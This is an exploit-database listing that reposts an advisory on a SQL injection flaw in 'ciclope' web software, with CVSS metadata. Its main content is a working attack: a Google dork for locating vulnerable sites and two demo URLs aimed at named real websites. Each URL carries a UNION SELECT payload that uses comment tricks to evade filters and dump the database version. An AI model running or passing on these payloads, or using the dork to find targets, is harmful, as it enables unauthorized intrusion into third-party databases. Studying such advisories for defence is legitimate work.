Advertisement






ciclope - Sql Injection Vulnerability

CVE Category Price Severity
N/A CWE-89 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2021-09-01
CPE
cpe:cpe:/a:ciclope_project:ciclope
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021090011

Below is a copy:

ciclope - Sql Injection Vulnerability
*********************************************************
#Exploit Title: ciclope -  Sql Injection Vulnerability
#Date: 2021-09-02
#Exploit Author: Behrouz Mansoori
#Google Dork: "web by ciclope"
#Category:webapps
#Tested On: windows 10, Firefox
 
 
Proof of Concept:
Search google Dork: "web by ciclope"


### Demo :

https://www.beplegal.com/lawyer.php?id=-5%27%20/*!12345uniOn*/%20/*!12345selEct*/%201,version(),3,4,5,6,7,8,9--+

http://www.serranoehijos.com/crane.php?id=-48%27%20/*!12345union*/%20select%201,version(),3,4,5,6,7,8,9,10--+


********************************************************* 
#Discovered by: Behrouz mansoori
#Instagram: Behrouz_mansoori
#Email: [email protected]
*********************************************************

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum